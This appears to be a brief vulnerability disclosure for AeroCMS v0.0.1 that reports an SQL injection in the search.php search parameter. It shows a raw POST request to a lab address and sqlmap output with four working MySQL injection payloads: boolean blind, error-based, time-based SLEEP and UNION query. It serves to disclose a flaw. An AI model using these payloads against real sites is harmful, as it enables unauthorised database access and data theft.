AeroCMS
AeroCMS copied to clipboard
MegaTKC
Aero CMS v0.0.1 - SQL Injection (search box)
POST /search.php HTTP/1.1 Host: 192.168.243.133 Content-Length: 19 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.243.133/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.243.133/search.php Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=dt1o6jbah3s8qdti60pg464i59 Connection: close
search='saas&submit=
sqlmap identified the following injection point(s) with a total of 134 HTTP(s) requests:
Parameter: search (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: search=saas' OR NOT 8064=8064#&submit=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: search=saas' AND (SELECT 8045 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT (ELT(8045=8045,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ZINc&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=saas' AND (SELECT 5006 FROM (SELECT(SLEEP(5)))tyOR)-- wINj&submit=
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: search=saas' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7a71,0x5142655063635254574b6b4967424f53796e4f465a784a6e576b4868654868735956434d6e63544d,0x71766b7071),NULL,NULL,NULL,NULL,NULL,NULL#&submit=
